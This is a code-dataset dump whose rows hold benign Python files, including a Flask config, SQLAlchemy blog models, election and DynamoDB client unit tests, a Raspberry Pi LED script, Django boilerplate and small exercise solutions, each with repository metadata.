blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2337dbfe31cf2f3bcaceca10f0429a098ea2c2b1
|
d59b11ac0465a430b7f7402f7928b6bd1c5bc9f1
|
/config.py
|
63e1cc63b674484defdb6ca379d035703491d7f7
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
mmmika/MAX-Audio-Sample-Generator
|
c94222a701f6c6e76089687c49929623f488ea62
|
5d22b6cea0a42fe8e1a088201972baf9acbe5089
|
refs/heads/master
| 2020-03-31T12:57:56.322625
| 2018-10-05T22:34:19
| 2018-10-05T22:34:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 855
|
py
|
# Flask settings
DEBUG = False
# Flask-restplus settings
RESTPLUS_MASK_SWAGGER = False
# Application settings
# API metadata
API_TITLE = 'Model Asset Exchange Server'
API_DESC = 'An API for serving models'
API_VERSION = '0.1'
# default model
MODEL_NAME = 'wavegan'
DEFAULT_MODEL_PATH = 'assets/models'
MODEL_LICENSE = 'Apache2'
# generator model options and default
DEFAULT_MODEL = 'lofi-instrumentals'
MODELS = ['lofi-instrumentals','up','down','left','right','stop','go']
INPUT_TENSOR = 'z:0'
OUTPUT_TENSOR = 'G_z:0'
MODEL_META_DATA = {
'id': '{}'.format(MODEL_NAME.lower()),
'name': 'WaveGAN audio generation model'.format(MODEL_NAME),
'description': 'Generative Adversarial Network, trained using TensorFlow on spoken commands and lo-fi instrumental music',
'type': 'audio-modeling',
'license': '{}'.format(MODEL_LICENSE)
}
|
[
"1996anoojpatel@gmail.com"
] |
1996anoojpatel@gmail.com
|
10a528647749bc0baae12598193504377e143439
|
f834363c77fed59810549fc61d569ebbaa84de82
|
/blog/database.py
|
91fa4dfa953ee73949b6df890af45aee99db64dc
|
[] |
no_license
|
jonnyfram/blog
|
b77d8aeb5ead1fe7f7659547dc432fb4249d662f
|
db79ab174978a3517bc8143d046247d96fd32aa2
|
refs/heads/master
| 2020-04-06T04:17:25.343030
| 2017-07-06T14:37:04
| 2017-07-06T14:37:04
| 95,437,255
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,151
|
py
|
import datetime
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Text, DateTime
from sqlalchemy import ForeignKey
from sqlalchemy.orm import relationship
from . import app
from flask_login import UserMixin
engine = create_engine(app.config["SQLALCHEMY_DATABASE_URI"])
Base = declarative_base()
Session = sessionmaker(bind=engine)
session = Session()
class Entry(Base):
__tablename__ = "entries"
id = Column(Integer, primary_key=True)
title = Column(String(1024))
content = Column(Text)
datetime = Column(DateTime, default=datetime.datetime.now())
author_id = Column(Integer, ForeignKey('users.id'))
#def generaet_summary(self):
# return self.content[0:100]
class User(Base, UserMixin):
__tablename__ = "users"
id = Column(Integer, primary_key=True)
name = Column(String(128))
email = Column(String(128), unique=True)
password = Column(String(128))
entries = relationship("Entry", backref="author")
Base.metadata.create_all(engine)
|
[
"jonnyfram@gmail.com"
] |
jonnyfram@gmail.com
|
2a5de420a068fa3e361c24ec82beef335291f181
|
527af4c3c48678d8b167cb9b23d90d57c7606dd3
|
/src/tests/test_models.py
|
927c23c7b071ebbd61d368716e1052348f0afaae
|
[
"MIT"
] |
permissive
|
PRByTheBackDoor/ElectionRunner
|
8713e398e8fc2fece65eb22e4dc5193bccac108e
|
77f822b5ac4e21fa567950a762a9595a8ca08007
|
refs/heads/master
| 2020-04-06T04:30:56.959287
| 2014-12-27T00:22:11
| 2014-12-27T00:22:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,443
|
py
|
# The MIT License (MIT)
#
# Copyright (c) 2014 PRByTheBackDoor
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Provides unit tests for the ``models'' package."""
from unittest import TestCase, main
from models import Election, Constituency, Party, Candidate, Outcome
class ElectionTests(TestCase):
"""Test all public functions provided by the Election() class."""
def setUp(self):
pass
def test_election(self):
"""Test the public ``add_candidate'' function provided by the
Election() class.
"""
el = Election()
con1 = Constituency("test")
con2 = Constituency("test2")
party1 = Party("party1")
party2 = Party("party2")
candidate1 = Candidate("candidate1", party1, con1)
candidate2 = Candidate("candidate2", party2, con1)
candidate3 = Candidate("candidate3", party2, con2)
el.add_candidate(candidate1)
self.assertTrue(candidate1 in el.candidates)
self.assertTrue(party1 in el.parties)
self.assertTrue(con1 in el.constituencies)
with self.assertRaises(AssertionError):
el.add_candidate(candidate1)
el.add_candidate(candidate2)
self.assertTrue(candidate2 in el.candidates)
self.assertTrue(party1 in el.parties)
self.assertTrue(con1 in el.constituencies)
self.assertEqual(len(el.candidates), 2)
self.assertEqual(len(el.parties), 2)
self.assertEqual(len(el.constituencies), 1)
el.add_candidate(candidate3)
self.assertTrue(candidate3 in el.candidates)
self.assertTrue(party2 in el.parties)
self.assertTrue(con2 in el.constituencies)
self.assertEqual(len(el.candidates), 3)
self.assertEqual(len(el.parties), 2)
self.assertEqual(len(el.constituencies), 2)
class ConstituencyTests(TestCase):
"""Test all public functions provided by the Constituency() class."""
def setUp(self):
pass
def test_add_candidate(self):
"""Test the public ``add_candidate'' function provided by the
Constituency() class.
"""
con = Constituency("test")
con2 = Constituency("test2")
party1 = Party("party1")
party2 = Party("party2")
party3 = Party("party3")
candidate1 = Candidate("candidate1", party1, con)
candidate2 = Candidate("candidate2", party2, con)
candidate3 = Candidate("candidate3", party3, con2)
candidate4 = Candidate("candidate4", party2, con)
con.add_candidate(candidate1)
self.assertTrue(candidate1 in con.candidates)
self.assertEqual(len(con.candidates), 1)
# attempt to add a candidate twice
with self.assertRaises(AssertionError):
con.add_candidate(candidate1)
self.assertEqual(len(con.candidates), 1)
self.assertEqual(len(con.parties), 1)
con.add_candidate(candidate2)
self.assertTrue(candidate1 in con.candidates)
self.assertTrue(candidate2 in con.candidates)
self.assertEqual(len(con.candidates), 2)
self.assertEqual(len(con.parties), 2)
# attempt to add a candidate with the wrong constituency
with self.assertRaises(AssertionError):
con.add_candidate(candidate3)
self.assertEqual(len(con.candidates), 2)
# attempt to add a candidate with the same party
with self.assertRaises(AssertionError):
con.add_candidate(candidate4)
self.assertEqual(len(con.candidates), 2)
class OutcomeTests(TestCase):
"""Test all public functions provided by the Outcome() class."""
def setUp(self):
pass
def test_add_winner(self):
"""Test the public ``add_winner'' function provided by the
Outcome() class.
"""
con = Constituency("test")
con2 = Constituency("test2")
party1 = Party("party1")
party2 = Party("party2")
candidate1 = Candidate("candidate1", party1, con)
candidate2 = Candidate("candidate2", party2, con2)
outcome = Outcome()
outcome.add_winner(candidate1)
self.assertEqual(len(outcome.winners), 1)
self.assertTrue(candidate1 in outcome.winners)
# attempt to add the same candidate
with self.assertRaises(AssertionError):
outcome.add_winner(candidate1)
if __name__ == '__main__':
main()
|
[
"oghm2-github@srcf.net"
] |
oghm2-github@srcf.net
|
e0cd1ebb5f222778682b48bf62bdbed9a7a2faef
|
3439c585e5f06ddf17c5690a07f0800c4372531d
|
/scripts/led.py
|
0be798fe4ac0e13cba93f3c9ce51fe1cc1bc6121
|
[] |
no_license
|
squidsoup/young-coders-2016
|
f24b9a2ee13c6b24d46f80f63ba8a548ef1698d4
|
b4b757dfd6414aa0ae9ec38fdf07ee6224475a1d
|
refs/heads/master
| 2020-07-08T20:49:13.182804
| 2017-04-11T23:35:38
| 2017-04-11T23:35:38
| 67,831,536
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 185
|
py
|
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BOARD)
GPIO.setup(7,GPIO.OUT)
while True:
GPIO.output(7,False)
time.sleep(0.5)
GPIO.output(7,True)
time.sleep(0.5)
|
[
"kit@nocturne.net.nz"
] |
kit@nocturne.net.nz
|
233695bb1c57dade93d46c11765d5914bc3e29e0
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03039/s199470028.py
|
5afbcf0436e1e2a41276ee67cfaa4072153695af
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 673
|
py
|
from itertools import combinations
def solve(N, M, K):
#A = [(n, m) for n in range(N) for m in range(M)]
r = 0
for x in range(N):
r += x * (N - x) * M * M
for y in range(M):
r += y * (M - y) * N * N
return r
def main():
N, M, K = map(int, input().split())
g1 = [1, 1]
g2 = [1, 1]
inverse = [0, 1]
mod = 10 ** 9 + 7
for i in range(2, N * M):
g1.append((g1[-1] * i) % mod)
inverse.append((-inverse[mod % i] * (mod // i)) % mod)
g2.append((g2[-1] * inverse[-1]) % mod)
t = solve(N, M, 2)
for k in range(2, K):
t = t * (N * M - k) * inverse[k - 1] % mod
print(t)
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
6aa35f7716f196962697548423b8318a68aeb789
|
981e6d9d34a91852407d45c4b7863779e228a516
|
/venv/bin/django-admin.py
|
92b413158aeac93a5d38ab2670da12a6bbeeaa4c
|
[] |
no_license
|
starwayagency/astrolabium_viber_bot
|
5062ffcb7b35b3608f9434fd486e5806e9084ae1
|
ec4e699bbc32e7275da0f12d77a0ae5cf32d000e
|
refs/heads/master
| 2023-08-18T06:36:43.315701
| 2021-10-24T18:04:31
| 2021-10-24T18:04:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 710
|
py
|
#!/home/jurgeon/projects/astrolabium/astrolabium_viber_bot/venv/bin/python3
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
|
[
"jurgeon018@gmail.com"
] |
jurgeon018@gmail.com
|
54348e0bd8926ccdffa383c51db801b380d5f575
|
428f2c48d6e9dabc3ac63012d4146b98bc38efc1
|
/refresh/refresh/wsgi.py
|
5f348f3bcbf706c24a9dad495e9bb99837caa19e
|
[] |
no_license
|
Arange-code/Django-project
|
f96d61fcebe0aa93bd311f86fe0a0f539b0b68f5
|
53527d1f442d87f8ac8f37d0c544168670e054cf
|
refs/heads/master
| 2021-02-05T12:29:56.201975
| 2020-02-28T14:31:58
| 2020-02-28T14:31:58
| 243,780,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
"""
WSGI config for refresh project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'refresh.settings')
application = get_wsgi_application()
|
[
"you@example.com"
] |
you@example.com
|
8ed5e9e3a463510b06a68a5076cb0cca96428c2a
|
65930b71495a028bb4a78f6c07a0e0e971aa503d
|
/mobee/new/migrations/0004_auto_20210905_2353.py
|
8fc2245611c23d97033458315b173cfb333ba354
|
[] |
no_license
|
sangmu1126/mobee
|
6111bd3287d9669ab61c2c8f805f0673194bf78a
|
a801abfcf65d1597a4eb281b88972945658f66fa
|
refs/heads/master
| 2023-07-18T08:51:00.396757
| 2021-09-05T15:54:46
| 2021-09-05T15:54:46
| 403,346,408
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 593
|
py
|
# Generated by Django 3.2.7 on 2021-09-05 14:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('new', '0003_rename_restaurant_review_movie'),
]
operations = [
migrations.AddField(
model_name='movie',
name='image',
field=models.CharField(default=None, max_length=500, null=True),
),
migrations.AddField(
model_name='movie',
name='password',
field=models.CharField(default=None, max_length=20, null=True),
),
]
|
[
"sangmu1126@gmail.com"
] |
sangmu1126@gmail.com
|
0b48da007baa45e59cf83c9b05f368505db68388
|
3d231cc28740289606b44b358edf33819dc89682
|
/Hacker_rank/hacker_rank_average.py
|
290785d57b22d2af3125d096199b8cba13fd8684
|
[] |
no_license
|
byuvraj/Solution_for_python_challanges
|
f49f031c89e5bb65a80ae6dd2dfbbb3a0b143e25
|
d41e92c5cf93bed3265ff7ec26f8d8d34f149297
|
refs/heads/main
| 2023-08-18T19:41:59.350427
| 2021-10-14T10:53:09
| 2021-10-14T10:53:09
| 373,757,156
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
if __name__ == '__main__':
n = int(input())
student_marks = {}
for _ in range(n):
name, *line = input().split()
scores = list(map(float, line))
student_marks[name] = scores
query_name = input()
marks = student_marks[query_name]
avg=0
print(marks)
n_ =len(marks)
for i in range(0,n_):
avg=marks[i]+avg
avg = avg/n_
print("{0:.2f}".format(avg))
|
[
"byuvaj0202@gmail.com"
] |
byuvaj0202@gmail.com
|
26f47532449dbed8b39096a83f8cc42ae7de4c34
|
4dbe3b1b2af3ff77e8086ec32ab58dcf47849a3e
|
/tests/__init__.py
|
50530a34b837af8bd1a04e3a510f33988b96846e
|
[
"MIT"
] |
permissive
|
mnpk/dynamo3
|
b83dc700345972ea2336ac8ca842fd9f23edf5c2
|
51eacee60bdf8d058831a9ab3583a2cfe9f91ca9
|
refs/heads/master
| 2021-01-16T21:54:32.089114
| 2016-04-30T00:53:55
| 2016-04-30T00:53:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,985
|
py
|
""" Tests for Dynamo3 """
from __future__ import unicode_literals
import six
from botocore.exceptions import ClientError
from decimal import Decimal
from mock import patch, MagicMock, ANY
from six.moves.cPickle import dumps, loads # pylint: disable=F0401,E0611
from six.moves.urllib.parse import urlparse # pylint: disable=F0401,E0611
from dynamo3 import (DynamoDBConnection, Binary, DynamoKey, Dynamizer, STRING,
ThroughputException, Table, GlobalIndex, DynamoDBError,
Limit)
from dynamo3.result import (add_dicts, Count, Capacity, ConsumedCapacity,
ResultSet)
try:
import unittest2 as unittest # pylint: disable=F0401
except ImportError:
import unittest
if six.PY3:
unittest.TestCase.assertItemsEqual = unittest.TestCase.assertCountEqual
def is_number(value):
""" Check if a value is a float or int """
return isinstance(value, float) or isinstance(value, six.integer_types)
class BaseSystemTest(unittest.TestCase):
""" Base class for system tests """
dynamo = None
def setUp(self):
super(BaseSystemTest, self).setUp()
# Clear out any pre-existing tables
for tablename in self.dynamo.list_tables():
self.dynamo.delete_table(tablename)
def tearDown(self):
super(BaseSystemTest, self).tearDown()
for tablename in self.dynamo.list_tables():
self.dynamo.delete_table(tablename)
self.dynamo.clear_hooks()
class TestMisc(BaseSystemTest):
""" Tests that don't fit anywhere else """
def tearDown(self):
super(TestMisc, self).tearDown()
self.dynamo.default_return_capacity = False
def test_connection_host(self):
""" Connection can access host of endpoint """
urlparse(self.dynamo.host)
def test_connection_region(self):
""" Connection can access name of connected region """
self.assertTrue(isinstance(self.dynamo.region, six.string_types))
def test_connect_to_region_old(self):
""" Can connect to a dynamo region """
conn = DynamoDBConnection.connect_to_region('us-west-1')
self.assertIsNotNone(conn.host)
def test_connect_to_region_creds_old(self):
""" Can connect to a dynamo region with credentials """
conn = DynamoDBConnection.connect_to_region(
'us-west-1', access_key='abc', secret_key='12345')
self.assertIsNotNone(conn.host)
def test_connect_to_host_without_session_old(self):
""" Can connect to a dynamo host without passing in a session """
conn = DynamoDBConnection.connect_to_host(access_key='abc',
secret_key='12345')
self.assertIsNotNone(conn.host)
def test_connect_to_region(self):
""" Can connect to a dynamo region """
conn = DynamoDBConnection.connect('us-west-1')
self.assertIsNotNone(conn.host)
def test_connect_to_region_creds(self):
""" Can connect to a dynamo region with credentials """
conn = DynamoDBConnection.connect(
'us-west-1', access_key='abc', secret_key='12345')
self.assertIsNotNone(conn.host)
def test_connect_to_host_without_session(self):
""" Can connect to a dynamo host without passing in a session """
conn = DynamoDBConnection.connect('us-west-1', host='localhost')
self.assertIsNotNone(conn.host)
@patch('dynamo3.connection.time')
def test_retry_on_throughput_error(self, time):
""" Throughput exceptions trigger a retry of the request """
def call(*_, **__):
""" Dummy service call """
response = {
'ResponseMetadata': {
'HTTPStatusCode': 400,
},
'Error': {
'Code': 'ProvisionedThroughputExceededException',
'Message': 'Does not matter',
}
}
raise ClientError(response, 'list_tables')
with patch.object(self.dynamo, 'client') as client:
client.list_tables.side_effect = call
with self.assertRaises(ThroughputException):
self.dynamo.call('list_tables')
self.assertEqual(len(time.sleep.mock_calls),
self.dynamo.request_retries - 1)
self.assertTrue(time.sleep.called)
def test_describe_missing(self):
""" Describing a missing table returns None """
ret = self.dynamo.describe_table('foobar')
self.assertIsNone(ret)
def test_magic_table_props(self):
""" Table magically looks up properties on response object """
hash_key = DynamoKey('id')
self.dynamo.create_table('foobar', hash_key=hash_key)
ret = self.dynamo.describe_table('foobar')
self.assertIsNotNone(ret.item_count)
with self.assertRaises(AttributeError):
self.assertIsNotNone(ret.crazy_property)
def test_magic_index_props(self):
""" Index magically looks up properties on response object """
index = GlobalIndex.all('idx-name', DynamoKey('id'))
index.response = {
'FooBar': 2
}
self.assertEqual(index.foo_bar, 2)
with self.assertRaises(AttributeError):
self.assertIsNotNone(index.crazy_property)
def test_describe_during_delete(self):
""" Describing a table during a delete operation should not crash """
response = {
'ItemCount': 0,
'ProvisionedThroughput': {
'NumberOfDecreasesToday': 0,
'ReadCapacityUnits': 5,
'WriteCapacityUnits': 5
},
'TableName': 'myTableName',
'TableSizeBytes': 0,
'TableStatus': 'DELETING'
}
table = Table.from_response(response)
self.assertEqual(table.status, 'DELETING')
def test_delete_missing(self):
""" Deleting a missing table returns False """
ret = self.dynamo.delete_table('foobar')
self.assertTrue(not ret)
def test_re_raise(self):
""" DynamoDBError can re-raise itself if missing exc_info """
err = DynamoDBError(400, Code='ErrCode', Message='Ouch', args={})
try:
err.re_raise()
self.assertTrue(False)
except DynamoDBError as e:
self.assertEqual(err, e)
def test_default_return_capacity(self):
""" When default_return_capacity=True, always return capacity """
self.dynamo.default_return_capacity = True
with patch.object(self.dynamo, 'call') as call:
call().get.return_value = None
rs = self.dynamo.scan('foobar')
list(rs)
call.assert_called_with('scan', TableName='foobar',
ReturnConsumedCapacity='INDEXES')
def test_list_tables_page(self):
""" Call to ListTables should page results """
hash_key = DynamoKey('id')
for i in range(120):
self.dynamo.create_table('table%d' % i, hash_key=hash_key)
tables = list(self.dynamo.list_tables(110))
self.assertEqual(len(tables), 110)
def test_limit_complete(self):
""" A limit with item_capacity = 0 is 'complete' """
limit = Limit(item_limit=0)
self.assertTrue(limit.complete)
class TestDataTypes(BaseSystemTest):
""" Tests for Dynamo data types """
def make_table(self):
""" Convenience method for making a table """
hash_key = DynamoKey('id')
self.dynamo.create_table('foobar', hash_key=hash_key)
def test_string(self):
""" Store and retrieve a string """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'abc'})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['id'], 'abc')
self.assertTrue(isinstance(item['id'], six.text_type))
def test_int(self):
""" Store and retrieve an int """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'a', 'num': 1})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['num'], 1)
def test_float(self):
""" Store and retrieve a float """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'a', 'num': 1.1})
item = list(self.dynamo.scan('foobar'))[0]
self.assertAlmostEqual(float(item['num']), 1.1)
def test_decimal(self):
""" Store and retrieve a Decimal """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'a', 'num': Decimal('1.1')})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['num'], Decimal('1.1'))
def test_binary(self):
""" Store and retrieve a binary """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'a', 'data': Binary('abc')})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['data'].value, b'abc')
def test_binary_bytes(self):
""" Store and retrieve bytes as a binary """
self.make_table()
data = {'a': 1, 'b': 2}
self.dynamo.put_item('foobar', {'id': 'a',
'data': Binary(dumps(data))})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(loads(item['data'].value), data)
def test_string_set(self):
""" Store and retrieve a string set """
self.make_table()
item = {
'id': 'a',
'datas': set(['a', 'b']),
}
self.dynamo.put_item('foobar', item)
ret = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(ret, item)
def test_number_set(self):
""" Store and retrieve a number set """
self.make_table()
item = {
'id': 'a',
'datas': set([1, 2, 3]),
}
self.dynamo.put_item('foobar', item)
ret = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(ret, item)
def test_binary_set(self):
""" Store and retrieve a binary set """
self.make_table()
item = {
'id': 'a',
'datas': set([Binary('a'), Binary('b')]),
}
self.dynamo.put_item('foobar', item)
ret = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(ret, item)
def test_binary_equal(self):
""" Binary should eq other Binaries and also raw bytestrings """
self.assertEqual(Binary('a'), Binary('a'))
self.assertEqual(Binary('a'), b'a')
self.assertFalse(Binary('a') != Binary('a'))
def test_binary_repr(self):
""" Binary repr should wrap the contained value """
self.assertEqual(repr(Binary('a')), 'Binary(%s)' % b'a')
def test_binary_converts_unicode(self):
""" Binary will convert unicode to bytes """
b = Binary('a')
self.assertTrue(isinstance(b.value, six.binary_type))
def test_binary_force_string(self):
""" Binary must wrap a string type """
with self.assertRaises(TypeError):
Binary(2)
def test_bool(self):
""" Store and retrieve a boolean """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'abc', 'b': True})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['b'], True)
self.assertTrue(isinstance(item['b'], bool))
def test_list(self):
""" Store and retrieve a list """
self.make_table()
self.dynamo.put_item('foobar', {'id': 'abc', 'l': ['a', 1, False]})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['l'], ['a', 1, False])
def test_dict(self):
""" Store and retrieve a dict """
self.make_table()
data = {
'i': 1,
's': 'abc',
'n': None,
'l': ['a', 1, True],
'b': False,
}
self.dynamo.put_item('foobar', {'id': 'abc', 'd': data})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['d'], data)
def test_nested_dict(self):
""" Store and retrieve a nested dict """
self.make_table()
data = {
's': 'abc',
'd': {
'i': 42,
},
}
self.dynamo.put_item('foobar', {'id': 'abc', 'd': data})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['d'], data)
def test_nested_list(self):
""" Store and retrieve a nested list """
self.make_table()
data = [
1,
[
True,
None,
'abc',
],
]
self.dynamo.put_item('foobar', {'id': 'abc', 'l': data})
item = list(self.dynamo.scan('foobar'))[0]
self.assertEqual(item['l'], data)
def test_unrecognized_type(self):
""" Dynamizer throws error on unrecognized type """
value = {
'ASDF': 'abc',
}
with self.assertRaises(TypeError):
self.dynamo.dynamizer.decode(value)
class TestDynamizer(unittest.TestCase):
""" Tests for the Dynamizer """
def test_register_encoder(self):
""" Can register a custom encoder """
from datetime import datetime
dynamizer = Dynamizer()
dynamizer.register_encoder(datetime, lambda d, v:
(STRING, v.isoformat()))
now = datetime.utcnow()
self.assertEqual(dynamizer.raw_encode(now), (STRING, now.isoformat()))
def test_encoder_missing(self):
""" If no encoder is found, raise ValueError """
from datetime import datetime
dynamizer = Dynamizer()
with self.assertRaises(ValueError):
dynamizer.encode(datetime.utcnow())
class TestResultModels(unittest.TestCase):
""" Tests for the model classes in results.py """
def test_add_dicts_base_case(self):
""" add_dict where one argument is None returns the other """
f = object()
self.assertEqual(add_dicts(f, None), f)
self.assertEqual(add_dicts(None, f), f)
def test_add_dicts(self):
""" Merge two dicts of values together """
a = {
'a': 1,
'b': 2,
}
b = {
'a': 3,
'c': 4,
}
ret = add_dicts(a, b)
self.assertEqual(ret, {
'a': 4,
'b': 2,
'c': 4,
})
def test_count_repr(self):
""" Count repr """
count = Count(0, 0)
self.assertEqual(repr(count), "Count(0)")
def test_count_addition(self):
""" Count addition """
count = Count(4, 2)
self.assertEqual(count + 5, 9)
def test_count_subtraction(self):
""" Count subtraction """
count = Count(4, 2)
self.assertEqual(count - 2, 2)
def test_count_multiplication(self):
""" Count multiplication """
count = Count(4, 2)
self.assertEqual(2 * count, 8)
def test_count_division(self):
""" Count division """
count = Count(4, 2)
self.assertEqual(count / 2, 2)
def test_count_add_none_capacity(self):
""" Count addition with one None consumed_capacity """
cap = Capacity.create_read({'CapacityUnits': 3})
count = Count(4, 2)
count2 = Count(5, 3, cap)
ret = count + count2
self.assertEqual(ret, 9)
self.assertEqual(ret.scanned_count, 5)
self.assertEqual(ret.consumed_capacity, cap)
def test_count_add_capacity(self):
""" Count addition with consumed_capacity """
count = Count(4, 2, Capacity.create_read({'CapacityUnits': 3}))
count2 = Count(5, 3, Capacity.create_read({'CapacityUnits': 2}))
ret = count + count2
self.assertEqual(ret, 9)
self.assertEqual(ret.scanned_count, 5)
self.assertEqual(ret.consumed_capacity.read, 5)
def test_capacity_factories(self):
""" Capacity.create_(read|write) factories """
cap = Capacity.create_read({'CapacityUnits': 3})
self.assertEqual(cap.read, 3)
self.assertEqual(cap.write, 0)
cap = Capacity.create_write({'CapacityUnits': 3})
self.assertEqual(cap.write, 3)
self.assertEqual(cap.read, 0)
def test_capacity_math(self):
""" Capacity addition and equality """
cap = Capacity(2, 4)
s = set([cap])
self.assertIn(Capacity(2, 4), s)
self.assertNotEqual(Capacity(1, 4), cap)
self.assertEqual(Capacity(1, 1) + Capacity(2, 2), Capacity(3, 3))
def test_capacity_format(self):
""" String formatting for Capacity """
c = Capacity(1, 3)
self.assertEqual(str(c), "R:1.0 W:3.0")
c = Capacity(0, 0)
self.assertEqual(str(c), "0")
def test_total_consumed_capacity(self):
""" ConsumedCapacity can parse results with only Total """
response = {
'TableName': 'foobar',
'CapacityUnits': 4,
}
cap = ConsumedCapacity.from_response(response, True)
self.assertEqual(cap.total.read, 4)
self.assertIsNone(cap.table_capacity)
def test_consumed_capacity_equality(self):
""" ConsumedCapacity addition and equality """
cap = ConsumedCapacity('foobar', Capacity(0, 10), Capacity(0, 2), {
'l-index': Capacity(0, 4),
}, {
'g-index': Capacity(0, 3),
})
c2 = ConsumedCapacity('foobar', Capacity(0, 10), Capacity(0, 2), {
'l-index': Capacity(0, 4),
'l-index2': Capacity(0, 7),
})
self.assertNotEqual(cap, c2)
c3 = ConsumedCapacity('foobar', Capacity(0, 10), Capacity(0, 2), {
'l-index': Capacity(0, 4),
}, {
'g-index': Capacity(0, 3),
})
self.assertIn(cap, set([c3]))
combined = cap + c2
self.assertEqual(
cap + c2,
ConsumedCapacity('foobar', Capacity(0, 20), Capacity(0, 4),
{'l-index': Capacity(0, 8), 'l-index2': Capacity(0, 7), },
{'g-index': Capacity(0, 3), }))
self.assertIn(str(Capacity(0, 3)), str(combined))
def test_add_different_tables(self):
""" Cannot add ConsumedCapacity of two different tables """
c1 = ConsumedCapacity('foobar', Capacity(1, 28))
c2 = ConsumedCapacity('boofar', Capacity(3, 0))
with self.assertRaises(TypeError):
c1 += c2
def test_always_continue_query(self):
""" Regression test.
If result has no items but does have LastEvaluatedKey, keep querying.
"""
conn = MagicMock()
conn.dynamizer.decode_keys.side_effect = lambda x: x
items = ['a', 'b']
results = [
{'Items': [], 'LastEvaluatedKey': {'foo': 1, 'bar': 2}},
{'Items': [], 'LastEvaluatedKey': {'foo': 1, 'bar': 2}},
{'Items': items},
]
conn.call.side_effect = lambda *_, **__: results.pop(0)
